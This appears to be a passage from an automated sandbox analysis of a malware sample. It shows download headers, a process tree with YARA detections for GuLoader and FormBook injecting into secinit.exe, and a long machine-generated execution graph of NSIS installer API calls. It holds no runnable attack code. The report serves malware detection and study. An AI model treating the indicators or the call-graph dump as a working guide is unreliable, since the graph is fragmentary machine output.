                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Dom [TRUNCATED]
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 270400
                                      Last-Modified: Mon, 27 May 2024 11:27:50 GMT
                                      X-GUploader-UploadID: ABPtcPpKIQPT8prEKCKSemSaXDXygpXMLqOxd53KkaAagm_Ol6oemj7EQTwRi_-Dwr39fKcisKg
                                      Date: Tue, 04 Jun 2024 12:14:46 GMT
                                      Expires: Tue, 04 Jun 2024 12:14:46 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=Cquxjg==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Target ID:5
                                      Start time:08:14:14
                                      Start date:04/06/2024
                                      Path:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\fJuwM4Bwi7.exe"
                                      Imagebase:0x400000
                                      File size:600'280 bytes
                                      MD5 hash:0CB5485C0840CF976767BC45FB0B45D4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.79055979562.0000000004FBC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:8
                                      Start time:08:14:33
                                      Start date:04/06/2024
                                      Path:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\fJuwM4Bwi7.exe"
                                      Imagebase:0x7ff681ba0000
                                      File size:600'280 bytes
                                      MD5 hash:0CB5485C0840CF976767BC45FB0B45D4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:true

                                      Target ID:9
                                      Start time:08:14:50
                                      Start date:04/06/2024
                                      Path:C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe"
                                      Imagebase:0xa20000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      Target ID:10
                                      Start time:08:14:52
                                      Start date:04/06/2024
                                      Path:C:\Windows\SysWOW64\secinit.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\secinit.exe"
                                      Imagebase:0x340000
                                      File size:9'728 bytes
                                      MD5 hash:3B4B8DB765C75B8024A208AE6915223C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Reputation:moderate
                                      Has exited:false

                                      Target ID:11
                                      Start time:08:15:05
                                      Start date:04/06/2024
                                      Path:C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe"
                                      Imagebase:0xa20000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      Target ID:12
                                      Start time:08:15:17
                                      Start date:04/06/2024
                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                      Imagebase:0x7ff738760000
                                      File size:687'008 bytes
                                      MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                        Execution Graph

                                        Execution Coverage:20.7%
                                        Dynamic/Decrypted Code Coverage:14.3%
                                        Signature Coverage:19.7%
                                        Total number of Nodes:1473
                                        Total number of Limit Nodes:42
4021bc lstrlenA lstrlenA 4160 40501f 25 API calls 4158->4160 4159 40501f 25 API calls 4163 4021b7 4159->4163 4161 4021f8 SHFileOperationA 4160->4161 4162 4021af 4161->4162 4161->4163 4162->4159 4162->4163 4165 406050 FindClose 4164->4165 4166 4021ab 4164->4166 4165->4166 4166->4158 4166->4162 5191 40280a 5192 4029e0 18 API calls 5191->5192 5193 402810 5192->5193 5194 402841 5193->5194 5195 402663 5193->5195 5197 40281e 5193->5197 5194->5195 5196 405d58 18 API calls 5194->5196 5196->5195 5197->5195 5199 405c94 wsprintfA 5197->5199 5199->5195 5200 40220c 5201 402213 5200->5201 5205 402226 5200->5205 5202 405d58 18 API calls 5201->5202 5203 402220 5202->5203 5204 40554a MessageBoxIndirectA 5203->5204 5204->5205 5206 401490 5207 40501f 25 API calls 5206->5207 5208 401497 5207->5208 5209 406310 5211 406194 5209->5211 5210 406aff 5211->5210 5212 406215 GlobalFree 5211->5212 5213 40621e GlobalAlloc 5211->5213 5214 406295 GlobalAlloc 5211->5214 5215 40628c GlobalFree 5211->5215 5212->5213 5213->5210 5213->5211 5214->5210 5214->5211 5215->5214 5216 401b11 5217 401b62 5216->5217 5218 401b1e 5216->5218 5219 401b66 5217->5219 5220 401b8b GlobalAlloc 5217->5220 5221 401ba6 5218->5221 5226 401b35 5218->5226 5229 402226 5219->5229 5237 405d36 lstrcpynA 5219->5237 5222 405d58 18 API calls 5220->5222 5223 405d58 18 API calls 5221->5223 5221->5229 5222->5221 5225 402220 5223->5225 5230 40554a MessageBoxIndirectA 5225->5230 5235 405d36 lstrcpynA 5226->5235 5228 401b78 GlobalFree 5228->5229 5230->5229 5231 401b44 5236 405d36 lstrcpynA 5231->5236 5233 401b53 5238 405d36 lstrcpynA 5233->5238 5235->5231 5236->5233 5237->5228 5238->5229 5239 404f93 5240 404fa3 5239->5240 5241 404fb7 5239->5241 5242 404fa9 5240->5242 5251 405000 5240->5251 5243 404fbf IsWindowVisible 5241->5243 5247 404fd6 5241->5247 5245 404038 SendMessageA 5242->5245 5246 404fcc 5243->5246 5243->5251 5244 405005 CallWindowProcA 5248 404fb3 5244->5248 5245->5248 5252 4048ea SendMessageA 5246->5252 5247->5244 5257 40496a 
5247->5257 5251->5244 5253 404949 SendMessageA 5252->5253 5254 40490d GetMessagePos ScreenToClient SendMessageA 5252->5254 5255 404941 5253->5255 5254->5255 5256 404946 5254->5256 5255->5247 5256->5253 5266 405d36 lstrcpynA 5257->5266 5259 40497d 5267 405c94 wsprintfA 5259->5267 5261 404987 5262 40140b 2 API calls 5261->5262 5263 404990 5262->5263 5268 405d36 lstrcpynA 5263->5268 5265 404997 5265->5251 5266->5259 5267->5261 5268->5265 5269 401c95 5270 4029e0 18 API calls 5269->5270 5271 401c9c 5270->5271 5272 4029e0 18 API calls 5271->5272 5273 401ca4 GetDlgItem 5272->5273 5274 4024cb 5273->5274 5275 401595 5276 4029fd 18 API calls 5275->5276 5277 40159c SetFileAttributesA 5276->5277 5278 4015ae 5277->5278 4239 403217 #17 SetErrorMode OleInitialize 4240 406061 3 API calls 4239->4240 4241 40325c SHGetFileInfoA 4240->4241 4314 405d36 lstrcpynA 4241->4314 4243 403287 GetCommandLineA 4315 405d36 lstrcpynA 4243->4315 4245 403299 GetModuleHandleA 4246 4032b0 4245->4246 4247 4057f1 CharNextA 4246->4247 4248 4032c4 CharNextA 4247->4248 4254 4032d4 4248->4254 4249 40339e 4250 4033b1 GetTempPathA 4249->4250 4316 4031e3 4250->4316 4252 4033c9 4255 403423 DeleteFileA 4252->4255 4256 4033cd GetWindowsDirectoryA lstrcatA 4252->4256 4253 4057f1 CharNextA 4253->4254 4254->4249 4254->4253 4259 4033a0 4254->4259 4324 402c79 GetTickCount GetModuleFileNameA 4255->4324 4258 4031e3 11 API calls 4256->4258 4261 4033e9 4258->4261 4408 405d36 lstrcpynA 4259->4408 4260 403437 4268 4057f1 CharNextA 4260->4268 4297 4034bd 4260->4297 4308 4034cd 4260->4308 4261->4255 4263 4033ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4261->4263 4264 4031e3 11 API calls 4263->4264 4266 40341b 4264->4266 4266->4255 4266->4308 4270 403452 4268->4270 4277 403498 4270->4277 4278 4034fc lstrcatA lstrcmpiA 4270->4278 4271 4034e6 4434 40554a 4271->4434 4272 4035da 4273 40367d ExitProcess 4272->4273 4276 406061 3 API calls 4272->4276 4280 4035ed 4276->4280 4409 4058b4 4277->4409 4282 
403518 CreateDirectoryA SetCurrentDirectoryA 4278->4282 4278->4308 4285 406061 3 API calls 4280->4285 4283 40353a 4282->4283 4284 40352f 4282->4284 4439 405d36 lstrcpynA 4283->4439 4438 405d36 lstrcpynA 4284->4438 4289 4035f6 4285->4289 4291 406061 3 API calls 4289->4291 4293 4035ff 4291->4293 4292 4034b2 4424 405d36 lstrcpynA 4292->4424 4296 40361d 4293->4296 4302 40360d GetCurrentProcess 4293->4302 4295 405d58 18 API calls 4298 403579 DeleteFileA 4295->4298 4299 406061 3 API calls 4296->4299 4354 403787 4297->4354 4300 403586 CopyFileA 4298->4300 4311 403548 4298->4311 4301 403654 4299->4301 4300->4311 4304 403669 ExitWindowsEx 4301->4304 4307 403676 4301->4307 4302->4296 4303 4035ce 4305 405bea 40 API calls 4303->4305 4304->4273 4304->4307 4305->4308 4448 40140b 4307->4448 4425 403695 4308->4425 4310 405d58 18 API calls 4310->4311 4311->4295 4311->4303 4311->4310 4313 4035ba CloseHandle 4311->4313 4440 405bea 4311->4440 4445 4054e5 CreateProcessA 4311->4445 4313->4311 4314->4243 4315->4245 4317 405fa1 5 API calls 4316->4317 4319 4031ef 4317->4319 4318 4031f9 4318->4252 4319->4318 4451 4057c6 lstrlenA CharPrevA 4319->4451 4322 4059f6 2 API calls 4323 403215 4322->4323 4323->4252 4454 4059c7 GetFileAttributesA CreateFileA 4324->4454 4326 402cbc 4353 402cc9 4326->4353 4455 405d36 lstrcpynA 4326->4455 4328 402cdf 4456 40580d lstrlenA 4328->4456 4332 402cf0 GetFileSize 4333 402df1 4332->4333 4335 402d07 4332->4335 4461 402bda 4333->4461 4335->4333 4339 402e8c 4335->4339 4346 402bda 33 API calls 4335->4346 4335->4353 4492 4031b6 4335->4492 4338 402e34 GlobalAlloc 4343 402e4b 4338->4343 4340 402bda 33 API calls 4339->4340 4340->4353 4342 402e15 4345 4031b6 ReadFile 4342->4345 4344 4059f6 2 API calls 4343->4344 4347 402e5c CreateFileA 4344->4347 4348 402e20 4345->4348 4346->4335 4349 402e96 4347->4349 4347->4353 4348->4338 4348->4353 4476 4031cc SetFilePointer 4349->4476 4351 402ea4 4477 402f1f 4351->4477 4353->4260 4355 406061 3 API calls 4354->4355 4356 40379b 
4355->4356 4357 4037a1 4356->4357 4358 4037b3 4356->4358 4542 405c94 wsprintfA 4357->4542 4359 405c1d 3 API calls 4358->4359 4360 4037de 4359->4360 4361 4037fc lstrcatA 4360->4361 4363 405c1d 3 API calls 4360->4363 4364 4037b1 4361->4364 4363->4361 4526 403a4c 4364->4526 4367 4058b4 18 API calls 4369 40382e 4367->4369 4368 4038b7 4370 4058b4 18 API calls 4368->4370 4369->4368 4371 405c1d 3 API calls 4369->4371 4372 4038bd 4370->4372 4374 40385a 4371->4374 4373 4038cd LoadImageA 4372->4373 4375 405d58 18 API calls 4372->4375 4376 403973 4373->4376 4377 4038f4 RegisterClassA 4373->4377 4374->4368 4378 403876 lstrlenA 4374->4378 4381 4057f1 CharNextA 4374->4381 4375->4373 4380 40140b 2 API calls 4376->4380 4379 40392a SystemParametersInfoA CreateWindowExA 4377->4379 4407 40397d 4377->4407 4382 403884 lstrcmpiA 4378->4382 4383 4038aa 4378->4383 4379->4376 4384 403979 4380->4384 4385 403874 4381->4385 4382->4383 4386 403894 GetFileAttributesA 4382->4386 4387 4057c6 3 API calls 4383->4387 4389 403a4c 19 API calls 4384->4389 4384->4407 4385->4378 4388 4038a0 4386->4388 4390 4038b0 4387->4390 4388->4383 4391 40580d 2 API calls 4388->4391 4392 40398a 4389->4392 4543 405d36 lstrcpynA 4390->4543 4391->4383 4394 403996 ShowWindow LoadLibraryA 4392->4394 4395 403a19 4392->4395 4397 4039b5 LoadLibraryA 4394->4397 4398 4039bc GetClassInfoA 4394->4398 4535 4050f1 OleInitialize 4395->4535 4397->4398 4400 4039d0 GetClassInfoA RegisterClassA 4398->4400 4401 4039e6 DialogBoxParamA 4398->4401 4399 403a1f 4403 403a23 4399->4403 4404 403a3b 4399->4404 4400->4401 4402 40140b 2 API calls 4401->4402 4402->4407 4406 40140b 2 API calls 4403->4406 4403->4407 4405 40140b 2 API calls 4404->4405 4405->4407 4406->4407 4407->4308 4408->4250 4552 405d36 lstrcpynA 4409->4552 4411 4058c5 4412 40585f 4 API calls 4411->4412 4413 4058cb 4412->4413 4414 4034a3 4413->4414 4415 405fa1 5 API calls 4413->4415 4414->4308 4423 405d36 lstrcpynA 4414->4423 4421 4058db 4415->4421 4416 405906 lstrlenA 4417 405911 
4416->4417 4416->4421 4419 4057c6 3 API calls 4417->4419 4418 40603a 2 API calls 4418->4421 4420 405916 GetFileAttributesA 4419->4420 4420->4414 4421->4414 4421->4416 4421->4418 4422 40580d 2 API calls 4421->4422 4422->4416 4423->4292 4424->4297 4426 4036b0 4425->4426 4427 4036a6 CloseHandle 4425->4427 4428 4036c4 4426->4428 4429 4036ba CloseHandle 4426->4429 4427->4426 4553 4036f2 4428->4553 4429->4428 4437 40555f 4434->4437 4435 4034f4 ExitProcess 4436 405573 MessageBoxIndirectA 4436->4435 4437->4435 4437->4436 4438->4283 4439->4311 4441 406061 3 API calls 4440->4441 4442 405bf1 4441->4442 4444 405c12 4442->4444 4610 405a6e lstrcpyA 4442->4610 4444->4311 4446 405524 4445->4446 4447 405518 CloseHandle 4445->4447 4446->4311 4447->4446 4449 401389 2 API calls 4448->4449 4450 401420 4449->4450 4450->4273 4452 4057e0 lstrcatA 4451->4452 4453 403201 CreateDirectoryA 4451->4453 4452->4453 4453->4322 4454->4326 4455->4328 4457 40581a 4456->4457 4458 402ce5 4457->4458 4459 40581f CharPrevA 4457->4459 4460 405d36 lstrcpynA 4458->4460 4459->4457 4459->4458 4460->4332 4462 402c00 4461->4462 4463 402be8 4461->4463 4465 402c10 GetTickCount 4462->4465 4466 402c08 4462->4466 4464 402bf1 DestroyWindow 4463->4464 4471 402bf8 4463->4471 4464->4471 4468 402c1e 4465->4468 4465->4471 4496 40609a 4466->4496 4469 402c53 CreateDialogParamA ShowWindow 4468->4469 4470 402c26 4468->4470 4469->4471 4470->4471 4500 402bbe 4470->4500 4471->4338 4471->4353 4495 4031cc SetFilePointer 4471->4495 4473 402c34 wsprintfA 4474 40501f 25 API calls 4473->4474 4475 402c51 4474->4475 4475->4471 4476->4351 4478 402f4b 4477->4478 4479 402f2f SetFilePointer 4477->4479 4503 40303a GetTickCount 4478->4503 4479->4478 4484 40303a 43 API calls 4485 402f82 4484->4485 4486 402ffc ReadFile 4485->4486 4488 402ff6 4485->4488 4491 402f92 4485->4491 4486->4488 4488->4353 4489 405a3f ReadFile 4489->4491 4490 402fc5 WriteFile 4490->4488 4490->4491 4491->4488 4491->4489 4491->4490 4493 405a3f ReadFile 4492->4493 4494 
4031c9 4493->4494 4494->4335 4495->4342 4497 4060b7 PeekMessageA 4496->4497 4498 4060c7 4497->4498 4499 4060ad DispatchMessageA 4497->4499 4498->4471 4499->4497 4501 402bcd 4500->4501 4502 402bcf MulDiv 4500->4502 4501->4502 4502->4473 4504 4031a4 4503->4504 4505 403069 4503->4505 4506 402bda 33 API calls 4504->4506 4518 4031cc SetFilePointer 4505->4518 4513 402f52 4506->4513 4508 403074 SetFilePointer 4512 403099 4508->4512 4509 4031b6 ReadFile 4509->4512 4511 402bda 33 API calls 4511->4512 4512->4509 4512->4511 4512->4513 4514 40312e WriteFile 4512->4514 4515 403185 SetFilePointer 4512->4515 4519 406161 4512->4519 4513->4488 4516 405a3f ReadFile 4513->4516 4514->4512 4514->4513 4515->4504 4517 402f6b 4516->4517 4517->4484 4517->4488 4518->4508 4520 406186 4519->4520 4523 40618e 4519->4523 4520->4512 4521 406215 GlobalFree 4522 40621e GlobalAlloc 4521->4522 4522->4520 4522->4523 4523->4520 4523->4521 4523->4522 4523->4523 4524 406295 GlobalAlloc 4523->4524 4525 40628c GlobalFree 4523->4525 4524->4520 4524->4523 4525->4524 4527 403a60 4526->4527 4544 405c94 wsprintfA 4527->4544 4529 403ad1 4530 405d58 18 API calls 4529->4530 4531 403add SetWindowTextA 4530->4531 4532 40380c 4531->4532 4533 403af9 4531->4533 4532->4367 4533->4532 4534 405d58 18 API calls 4533->4534 4534->4533 4545 404038 4535->4545 4537 40513b 4538 404038 SendMessageA 4537->4538 4540 40514d OleUninitialize 4538->4540 4539 405114 4539->4537 4548 401389 4539->4548 4540->4399 4542->4364 4543->4368 4544->4529 4546 404050 4545->4546 4547 404041 SendMessageA 4545->4547 4546->4539 4547->4546 4550 401390 4548->4550 4549 4013fe 4549->4539 4550->4549 4551 4013cb MulDiv SendMessageA 4550->4551 4551->4550 4552->4411 4554 403700 4553->4554 4555 4036c9 4554->4555 4556 403705 FreeLibrary GlobalFree 4554->4556 4557 4055f6 4555->4557 4556->4555 4556->4556 4558 4058b4 18 API calls 4557->4558 4559 405616 4558->4559 4560 405635 4559->4560 4561 40561e DeleteFileA 4559->4561 4563 405763 4560->4563 4597 405d36 lstrcpynA 
4560->4597 4562 4034d6 OleUninitialize 4561->4562 4562->4271 4562->4272 4563->4562 4568 40603a 2 API calls 4563->4568 4565 40565b 4566 405661 lstrcatA 4565->4566 4567 40566e 4565->4567 4569 405674 4566->4569 4570 40580d 2 API calls 4567->4570 4571 405787 4568->4571 4572 405682 lstrcatA 4569->4572 4574 40568d lstrlenA FindFirstFileA 4569->4574 4570->4569 4571->4562 4573 40578b 4571->4573 4572->4574 4575 4057c6 3 API calls 4573->4575 4574->4563 4579 4056b1 4574->4579 4576 405791 4575->4576 4578 4055ae 5 API calls 4576->4578 4577 4057f1 CharNextA 4577->4579 4580 40579d 4578->4580 4579->4577 4584 405742 FindNextFileA 4579->4584 4593 405703 4579->4593 4598 405d36 lstrcpynA 4579->4598 4581 4057a1 4580->4581 4582 4057b7 4580->4582 4581->4562 4587 40501f 25 API calls 4581->4587 4583 40501f 25 API calls 4582->4583 4583->4562 4584->4579 4586 40575a FindClose 4584->4586 4586->4563 4588 4057ae 4587->4588 4589 405bea 40 API calls 4588->4589 4592 4057b5 4589->4592 4591 4055f6 64 API calls 4591->4593 4592->4562 4593->4584 4593->4591 4594 40501f 25 API calls 4593->4594 4595 40501f 25 API calls 4593->4595 4596 405bea 40 API calls 4593->4596 4599 4055ae 4593->4599 4594->4584 4595->4593 4596->4593 4597->4565 4598->4579 4607 4059a2 GetFileAttributesA 4599->4607 4602 4055db 4602->4593 4603 4055d1 DeleteFileA 4605 4055d7 4603->4605 4604 4055c9 RemoveDirectoryA 4604->4605 4605->4602 4606 4055e7 SetFileAttributesA 4605->4606 4606->4602 4608 4055ba 4607->4608 4609 4059b4 SetFileAttributesA 4607->4609 4608->4602 4608->4603 4608->4604 4609->4608 4611 405a97 4610->4611 4612 405abd GetShortPathNameA 4610->4612 4635 4059c7 GetFileAttributesA CreateFileA 4611->4635 4614 405ad2 4612->4614 4615 405be4 4612->4615 4614->4615 4617 405ada wsprintfA 4614->4617 4615->4444 4616 405aa1 CloseHandle GetShortPathNameA 4616->4615 4618 405ab5 4616->4618 4619 405d58 18 API calls 4617->4619 4618->4612 4618->4615 4620 405b02 4619->4620 4636 4059c7 GetFileAttributesA CreateFileA 4620->4636 4622 405b0f 4622->4615 
4623 405b1e GetFileSize GlobalAlloc 4622->4623 4624 405b40 4623->4624 4625 405bdd CloseHandle 4623->4625 4626 405a3f ReadFile 4624->4626 4625->4615 4627 405b48 4626->4627 4627->4625 4637 40592c lstrlenA 4627->4637 4630 405b73 4632 40592c 4 API calls 4630->4632 4631 405b5f lstrcpyA 4633 405b81 4631->4633 4632->4633 4634 405bb8 SetFilePointer WriteFile GlobalFree 4633->4634 4634->4625 4635->4616 4636->4622 4638 40596d lstrlenA 4637->4638 4639 405975 4638->4639 4640 405946 lstrcmpiA 4638->4640 4639->4630 4639->4631 4640->4639 4641 405964 CharNextA 4640->4641 4641->4638 5279 10001058 5281 10001074 5279->5281 5280 100010dc 5281->5280 5282 100014bb GlobalFree 5281->5282 5283 10001091 5281->5283 5282->5283 5284 100014bb GlobalFree 5283->5284 5285 100010a1 5284->5285 5286 100010b1 5285->5286 5287 100010a8 GlobalSize 5285->5287 5288 100010b5 GlobalAlloc 5286->5288 5289 100010c6 5286->5289 5287->5286 5290 100014e2 3 API calls 5288->5290 5291 100010d1 GlobalFree 5289->5291 5290->5289 5291->5280 4682 403b19 4683 403b31 4682->4683 4684 403c6c 4682->4684 4683->4684 4685 403b3d 4683->4685 4686 403cbd 4684->4686 4687 403c7d GetDlgItem GetDlgItem 4684->4687 4688 403b48 SetWindowPos 4685->4688 4689 403b5b 4685->4689 4691 403d17 4686->4691 4699 401389 2 API calls 4686->4699 4690 403fec 19 API calls 4687->4690 4688->4689 4693 403b60 ShowWindow 4689->4693 4694 403b78 4689->4694 4695 403ca7 SetClassLongA 4690->4695 4692 404038 SendMessageA 4691->4692 4712 403c67 4691->4712 4722 403d29 4692->4722 4693->4694 4696 403b80 DestroyWindow 4694->4696 4697 403b9a 4694->4697 4698 40140b 2 API calls 4695->4698 4751 403f75 4696->4751 4700 403bb0 4697->4700 4701 403b9f SetWindowLongA 4697->4701 4698->4686 4702 403cef 4699->4702 4706 403c59 4700->4706 4707 403bbc GetDlgItem 4700->4707 4701->4712 4702->4691 4703 403cf3 SendMessageA 4702->4703 4703->4712 4704 40140b 2 API calls 4704->4722 4705 403f77 DestroyWindow EndDialog 4705->4751 4761 404053 4706->4761 4710 403bec 4707->4710 4711 403bcf 
SendMessageA IsWindowEnabled 4707->4711 4709 403fa6 ShowWindow 4709->4712 4714 403bf9 4710->4714 4715 403c40 SendMessageA 4710->4715 4716 403c0c 4710->4716 4725 403bf1 4710->4725 4711->4710 4711->4712 4713 405d58 18 API calls 4713->4722 4714->4715 4714->4725 4715->4706 4719 403c14 4716->4719 4720 403c29 4716->4720 4718 403fec 19 API calls 4718->4722 4723 40140b 2 API calls 4719->4723 4724 40140b 2 API calls 4720->4724 4721 403c27 4721->4706 4722->4704 4722->4705 4722->4712 4722->4713 4722->4718 4742 403eb7 DestroyWindow 4722->4742 4752 403fec 4722->4752 4723->4725 4726 403c30 4724->4726 4758 403fc5 4725->4758 4726->4706 4726->4725 4728 403da4 GetDlgItem 4729 403dc1 ShowWindow KiUserCallbackDispatcher 4728->4729 4730 403db9 4728->4730 4755 40400e KiUserCallbackDispatcher 4729->4755 4730->4729 4732 403deb EnableWindow 4736 403dff 4732->4736 4733 403e04 GetSystemMenu EnableMenuItem SendMessageA 4734 403e34 SendMessageA 4733->4734 4733->4736 4734->4736 4736->4733 4756 404021 SendMessageA 4736->4756 4757 405d36 lstrcpynA 4736->4757 4738 403e62 lstrlenA 4739 405d58 18 API calls 4738->4739 4740 403e73 SetWindowTextA 4739->4740 4741 401389 2 API calls 4740->4741 4741->4722 4743 403ed1 CreateDialogParamA 4742->4743 4742->4751 4744 403f04 4743->4744 4743->4751 4745 403fec 19 API calls 4744->4745 4746 403f0f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4745->4746 4747 401389 2 API calls 4746->4747 4748 403f55 4747->4748 4748->4712 4749 403f5d ShowWindow 4748->4749 4750 404038 SendMessageA 4749->4750 4750->4751 4751->4709 4751->4712 4753 405d58 18 API calls 4752->4753 4754 403ff7 SetDlgItemTextA 4753->4754 4754->4728 4755->4732 4756->4736 4757->4738 4759 403fd2 SendMessageA 4758->4759 4760 403fcc 4758->4760 4759->4721 4760->4759 4762 40406b GetWindowLongA 4761->4762 4772 4040f4 4761->4772 4763 40407c 4762->4763 4762->4772 4764 40408b GetSysColor 4763->4764 4765 40408e 4763->4765 4764->4765 4766 404094 SetTextColor 4765->4766 4767 40409e SetBkMode 4765->4767 4766->4767 
4768 4040b6 GetSysColor 4767->4768 4769 4040bc 4767->4769 4768->4769 4770 4040c3 SetBkColor 4769->4770 4771 4040cd 4769->4771 4770->4771 4771->4772 4773 4040e0 DeleteObject 4771->4773 4774 4040e7 CreateBrushIndirect 4771->4774 4772->4712 4773->4774 4774->4772 5299 402519 5300 4029e0 18 API calls 5299->5300 5304 402523 5300->5304 5301 40258d 5302 405a3f ReadFile 5302->5304 5303 40258f 5308 405c94 wsprintfA 5303->5308 5304->5301 5304->5302 5304->5303 5305 40259f 5304->5305 5305->5301 5307 4025b5 SetFilePointer 5305->5307 5307->5301 5308->5301 4801 40231c 4802 402322 4801->4802 4803 4029fd 18 API calls 4802->4803 4804 402334 4803->4804 4805 4029fd 18 API calls 4804->4805 4806 40233e RegCreateKeyExA 4805->4806 4807 402663 4806->4807 4808 402368 4806->4808 4809 402380 4808->4809 4810 4029fd 18 API calls 4808->4810 4811 40238c 4809->4811 4814 4029e0 18 API calls 4809->4814 4813 402379 lstrlenA 4810->4813 4812 4023a7 RegSetValueExA 4811->4812 4815 402f1f 46 API calls 4811->4815 4816 4023bd RegCloseKey 4812->4816 4813->4809 4814->4811 4815->4812 4816->4807 5309 40261c 5310 402637 5309->5310 5311 40261f 5309->5311 5313 4027bd 5310->5313 5315 405d36 lstrcpynA 5310->5315 5312 40262c FindNextFileA 5311->5312 5312->5310 5315->5313 5316 40499c GetDlgItem GetDlgItem 5317 4049ee 7 API calls 5316->5317 5359 